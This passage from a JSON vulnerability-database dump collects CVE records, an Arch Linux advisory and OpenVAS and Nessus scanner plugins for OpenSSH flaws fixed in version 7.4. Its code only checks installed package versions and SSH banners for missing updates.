(Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2018-1069)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1069\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1069\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2018-1069 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"sshd in OpenSSH before 7.4 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence NEWKEYS message, as demonstrated by Honggfuzz, related to kex.c and packet.c.(CVE-2016-10708)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~28.h15\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~28.h15\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~28.h15\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~28.h15\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~28.h15\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2020-12-09T20:07:34", "description": "sshd in OpenSSH before 7.4 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence NEWKEYS message, as demonstrated by Honggfuzz, related to kex.c and packet.c.", "edition": 9, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-21T22:29:00", "title": "CVE-2016-10708", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10708"], "modified": "2019-06-26T08:15:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:netapp:oncommand_unified_manager:*", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:netapp:cloud_backup:-", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:netapp:vasa_provider:-", "cpe:/a:netapp:service_processor:-", "cpe:/a:netapp:storagegrid_webscale:-", "cpe:/a:netapp:data_ontap_edge:-", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:netapp:data_ontap:-", "cpe:/a:netapp:storagegrid:-", "cpe:/o:netapp:clustered_data_ontap:-", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-10708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10708", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:service_processor:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:data_ontap_edge:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storagegrid_webscale:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:netapp:storagegrid:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:vsphere:*:*", "cpe:2.3:a:netapp:vasa_provider:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:07:33", "description": "authfile.c in sshd in OpenSSH before 7.4 does not properly consider the effects of realloc on buffer contents, which might allow local users to obtain sensitive private-key information by leveraging access to a privilege-separated child process.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-01-05T02:59:00", "title": "CVE-2016-10011", "type": "cve", "cwe": ["CWE-320"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10011"], "modified": "2018-09-11T10:29:00", "cpe": ["cpe:/a:openbsd:openssh:7.3"], "id": "CVE-2016-10011", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10011", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:openbsd:openssh:7.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:33", "description": "sshd in OpenSSH before 7.4, when privilege separation is not used, creates forwarded Unix-domain sockets as root, which might allow local users to gain privileges via unspecified vectors, related to serverloop.c.", "edition": 5, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-05T02:59:00", "title": "CVE-2016-10010", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10010"], "modified": "2018-06-01T01:29:00", "cpe": ["cpe:/a:openbsd:openssh:7.3"], "id": "CVE-2016-10010", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10010", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:openbsd:openssh:7.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:33", "description": "Untrusted search path vulnerability in ssh-agent.c in ssh-agent in OpenSSH before 7.4 allows remote attackers to execute arbitrary local PKCS#11 modules by leveraging control over a forwarded agent-socket.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2017-01-05T02:59:00", "title": "CVE-2016-10009", "type": "cve", "cwe": ["CWE-426"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10009"], "modified": "2018-09-11T10:29:00", "cpe": ["cpe:/a:openbsd:openssh:7.3"], "id": "CVE-2016-10009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10009", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:openbsd:openssh:7.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:33", "description": "The shared memory manager (associated with pre-authentication compression) in sshd in OpenSSH before 7.4 does not ensure that a bounds check is enforced by all compilers, which might allows local users to gain privileges by leveraging access to a sandboxed privilege-separation process, related to the m_zback and m_zlib data structures.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-05T02:59:00", "title": "CVE-2016-10012", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10012"], "modified": "2018-09-11T10:29:00", "cpe": ["cpe:/a:openbsd:openssh:7.3"], "id": "CVE-2016-10012", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10012", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:openbsd:openssh:7.3:*:*:*:*:*:*:*"]}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012"], "description": "Arch Linux Security Advisory ASA-201612-20\n==========================================\n\nSeverity: Medium\nDate : 2016-12-22\nCVE-ID : CVE-2016-10009 CVE-2016-10010 CVE-2016-10011 CVE-2016-10012\nPackage : openssh\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-110\n\nSummary\n=======\n\nThe package openssh before version 7.4p1-1 is vulnerable to multiple\nissues including arbitrary code execution, privilege escalation,\ninformation disclosure and insufficient validation.\n\nResolution\n==========\n\nUpgrade to 7.4p1-1.\n\n# pacman -Syu \"openssh>=7.4p1-1\"\n\nThe problems have been fixed upstream in version 7.4p1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-10009 (arbitrary code execution)\n\nIt was found that ssh-agent could load PKCS#11 modules from paths\noutside of a trusted whitelist. An attacker able to load a crafted\nPKCS#11 module across a forwarded agent channel could potentially use\nthis flaw to execute arbitrary code on the system running the ssh-\nagent. Note that the attacker must have control of the forwarded agent-\nsocket and the ability to write to the filesystem of the host running\nssh-agent.\n\n- CVE-2016-10010 (privilege escalation)\n\nIt was found that when privilege separation was disabled in OpenSSH,\nforwarded Unix-domain sockets would be created by sshd with root\nprivileges instead of the privileges of the authenticated user. This\ncould allow an authenticated attacker to potentially gain root\nprivileges on the host system.\nPrivileges separation has been enabled by default since OpenSSH\n3.3/3.3p1 (2002-06-21). Thus, OpenSSH is not affected by default. An\naffected OpenSSH configuration would have to specifically disable\nprivilege separation with the \"UsePrivilegeSeparation no\" configuration\ndirective in /etc/ssh/sshd_config.\n\n- CVE-2016-10011 (information disclosure)\n\nIt was found that there is a theoretical leak of host private key\nmaterial to privilege-separated child processes via realloc() when\nreading keys. No such leak was observed in practice for normal-sized\nkeys, nor does a leak to the child processes directly expose key\nmaterial to unprivileged users.\n\n- CVE-2016-10012 (insufficient validation)\n\nIt was found that the shared memory manager used by pre-authentication\ncompression support had a bounds checks that could be elided by some\noptimizing compilers. Additionally, this memory manager was incorrectly\naccessible when pre-authentication compression was disabled. This could\npotentially allow attacks against the privileged monitor process from\nthe sandboxed privilege-separation process (a compromise of the latter\nwould be required first).\n\nImpact\n======\n\nA remote attacker may be able to perform attacks against the shared\nmemory manager used by pre-authentication compression support.\nFurthermore a local attacker may be able to execute arbitrary code and\ndisclose sensitive information under certain circumstances or possibly\nescalate privileges when having privilege separation explicitly\ndisabled.\n\nReferences\n==========\n\nhttps://www.openssh.com/txt/release-7.4\nhttp://seclists.org/oss-sec/2016/q4/708\nhttp://seclists.org/oss-sec/2016/q4/705\nhttps://access.redhat.com/security/cve/CVE-2016-10009\nhttps://access.redhat.com/security/cve/CVE-2016-10010\nhttps://access.redhat.com/security/cve/CVE-2016-10011\nhttps://access.redhat.com/security/cve/CVE-2016-10012", "modified": "2016-12-22T00:00:00", "published": "2016-12-22T00:00:00", "id": "ASA-201612-20", "href": "https://security.archlinux.org/ASA-201612-20", "type": "archlinux", "title": "[ASA-201612-20] openssh: multiple issues", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T01:10:15", "description": "New openssh packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix security issues.", "edition": 23, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-27T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : openssh (SSA:2016-358-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "p-cpe:/a:slackware:slackware_linux:openssh", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2016-358-02.NASL", "href": "https://www.tenable.com/plugins/nessus/96091", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-358-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96091);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2019/04/11 17:23:07\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\");\n script_xref(name:\"SSA\", value:\"2016-358-02\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : openssh (SSA:2016-358-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New openssh packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.647637\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?af8be5f5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.4p1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:32:54", "description": "According to its banner, the version of OpenSSH running on the remote\nhost is prior to 7.4. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A flaw exists in ssh-agent due to loading PKCS#11\n modules from paths that are outside a trusted whitelist.\n A local attacker can exploit this, by using a crafted\n request to load hostile modules via agent forwarding, to\n execute arbitrary code. To exploit this vulnerability,\n the attacker would need to control the forwarded\n agent-socket (on the host running the sshd server) and\n the ability to write to the file system of the host\n running ssh-agent. (CVE-2016-10009)\n\n - A flaw exists in sshd due to creating forwarded\n Unix-domain sockets with 'root' privileges whenever\n privilege separation is disabled. A local attacker can\n exploit this to gain elevated privileges.\n (CVE-2016-10010)\n\n - An information disclosure vulnerability exists in sshd\n within the realloc() function due leakage of key\n material to privilege-separated child processes when\n reading keys. A local attacker can possibly exploit this\n to disclose sensitive key material. Note that no such\n leak has been observed in practice for normal-sized\n keys, nor does a leak to the child processes directly\n expose key material to unprivileged users.\n (CVE-2016-10011)\n\n - A flaw exists in sshd within the shared memory manager\n used by pre-authenticating compression support due to a\n bounds check being elided by some optimizing compilers\n and due to the memory manager being incorrectly\n accessible when pre-authenticating compression is\n disabled. A local attacker can exploit this to gain\n elevated privileges. (CVE-2016-10012)\n\n - A denial of service vulnerability exists in sshd when\n handling KEXINIT messages. An unauthenticated, remote\n attacker can exploit this, by sending multiple KEXINIT\n messages, to consume up to 128MB per connection.\n\n - A flaw exists in sshd due to improper validation of\n address ranges by the AllowUser and DenyUsers\n directives at configuration load time. A local attacker\n can exploit this, via an invalid CIDR address range, to\n gain access to restricted areas.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 29, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2016-12-27T00:00:00", "title": "OpenSSH < 7.4 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:openbsd:openssh"], "id": "OPENSSH_74.NASL", "href": "https://www.tenable.com/plugins/nessus/96151", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96151);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/02/26 4:50:08\");\n\n script_cve_id(\n \"CVE-2016-10009\",\n \"CVE-2016-10010\",\n \"CVE-2016-10011\",\n \"CVE-2016-10012\"\n );\n script_bugtraq_id(\n 94968,\n 94972,\n 94975,\n 94977\n );\n script_xref(name:\"EDB-ID\", value:\"40962\");\n\n script_name(english:\"OpenSSH < 7.4 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the OpenSSH banner version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The SSH server running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of OpenSSH running on the remote\nhost is prior to 7.4. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A flaw exists in ssh-agent due to loading PKCS#11\n modules from paths that are outside a trusted whitelist.\n A local attacker can exploit this, by using a crafted\n request to load hostile modules via agent forwarding, to\n execute arbitrary code. To exploit this vulnerability,\n the attacker would need to control the forwarded\n agent-socket (on the host running the sshd server) and\n the ability to write to the file system of the host\n running ssh-agent. (CVE-2016-10009)\n\n - A flaw exists in sshd due to creating forwarded\n Unix-domain sockets with 'root' privileges whenever\n privilege separation is disabled. A local attacker can\n exploit this to gain elevated privileges.\n (CVE-2016-10010)\n\n - An information disclosure vulnerability exists in sshd\n within the realloc() function due leakage of key\n material to privilege-separated child processes when\n reading keys. A local attacker can possibly exploit this\n to disclose sensitive key material. Note that no such\n leak has been observed in practice for normal-sized\n keys, nor does a leak to the child processes directly\n expose key material to unprivileged users.\n (CVE-2016-10011)\n\n - A flaw exists in sshd within the shared memory manager\n used by pre-authenticating compression support due to a\n bounds check being elided by some optimizing compilers\n and due to the memory manager being incorrectly\n accessible when pre-authenticating compression is\n disabled. A local attacker can exploit this to gain\n elevated privileges. (CVE-2016-10012)\n\n - A denial of service vulnerability exists in sshd when\n handling KEXINIT messages. An unauthenticated, remote\n attacker can exploit this, by sending multiple KEXINIT\n messages, to consume up to 128MB per connection.\n\n - A flaw exists in sshd due to improper validation of\n address ranges by the AllowUser and DenyUsers\n directives at configuration load time. A local attacker\n can exploit this, via an invalid CIDR address range, to\n gain access to restricted areas.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.openssh.com/txt/release-7.4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to OpenSSH version 7.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-10009\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 